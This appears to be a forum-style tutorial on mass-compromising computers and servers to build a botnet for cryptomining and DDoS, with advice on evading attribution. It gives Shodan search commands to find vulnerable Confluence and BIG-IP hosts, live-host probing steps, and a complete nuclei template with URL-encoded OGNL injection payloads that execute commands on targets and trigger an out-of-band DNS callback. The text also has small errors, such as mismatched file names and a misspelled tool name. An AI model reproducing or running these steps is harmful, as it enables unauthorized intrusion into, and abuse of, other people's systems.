This tutorial covers how to accumulate large numbers of compromised personal computers and virtual private servers (PCs / VPS) for crypto-mining, distributed denial of service (DDoS) attacks, and other uses that require many compromised hosts.
REQUISITES
1. Shodan account having membership, membership fee for Shodan at £35 GBP or obtainable free in case of ".edu" email.
2. VPN (e.g. Mullvad).
3. Basic scripting aptitude.
WARNING
- DO NOT employ this technique without improperly concealing oneself.
- DO NOT endeavour in this without being fully aware of the consequences.
- DO NOT establish a connection via 'Secure Shell' to any compromised device from your local Computer.
- DO NOT engage in mining to your Bitcoin wallet (Monero only).
This is a basic process, not an advanced one.
TUTORIAL
1. First and foremost, secure your Shodan membership and VPN configuration.
2. Search for newly published CVEs (RCE only) and familiarise yourself with how they work. Study each one thoroughly. We shall use two CVEs for this thread:
- CVE-2022-26134 [X-Confluence]
- CVE-2022-1388 [BIG-IP Firewall]
Review both CVEs and the corresponding Proof of Concept available on GitHub.
3. Once comprehension is achieved, construct a Shodan dork using unique identifiers for these targeted services:
- Dork for CVE-2022-26134 [ X-Confluence]
- Dork for CVE-2022-1388 [ http.title:"BIG-IP®-+Redirect"]
Utilise these dorks to execute a Shodan search.
4. We shall utilise Shodan CLI to obtain IPs related to this service:
shodan search "X-Confluence" --fields ip_str,port --separator : --limit 100 > hosts.txt
At this point, you should see a list of IPs along with their corresponding ports.
5. We shall employ "httprobe" or "httpx" to discern live hosts:
cat hosts | httprobe -c 50 | tee live_hosts.txt
6. We shall use nuclei to automate testing for the vulnerability. As we are currently working with the first CVE, namely "Confluence", we shall use this template:
info:
name: Confluence - Remote Code Execution
author: pdteam,jbertman
severity: critical
description: |
Confluence Server and Data Center is susceptible to an unauthenticated remote code execution vulnerability.
reference:
- https://attackerkb.com/topics/BH1D56ZEhs/cve-2022-26134/rapid7-analysis
- https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
- https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
- https://jira.atlassian.com/browse/CONFSERVER-79016
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-26134
cwe-id: CWE-74
metadata:
shodan-query: http.component:"Atlassian Confluence"
verified: "true"
tags: cve,cve2022,confluence,rce,ognl,oast,cisa
requests:
- method: GET
path:
- "{{BaseURL}}/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionCont
ext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/"
- "{{BaseURL}}/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20{{interactsh-url}}%22%29%7D/"
stop-at-first-match: true
req-condition: true
matchers-condition: or
matchers:
- type: dsl
dsl:
- 'contains(to_lower(all_headers_1), "x-cmd-response:")'
- type: dsl
dsl:
- 'contains(interactsh_protocol, "dns")'
- 'contains(to_lower(response_2), "confluence")'
condition: and
extractors:
- type: kval
part: header
kval:
- "x_cmd_response"
# Enhanced by mp on 2022/07/04
Save it under the designation "attack.yaml".
7. We shall now pass live hosts to this templates:
cat live_hosts.txt | nucli -bs 50 -c 50 -t attack.yaml
At this point, wait for the results to come in.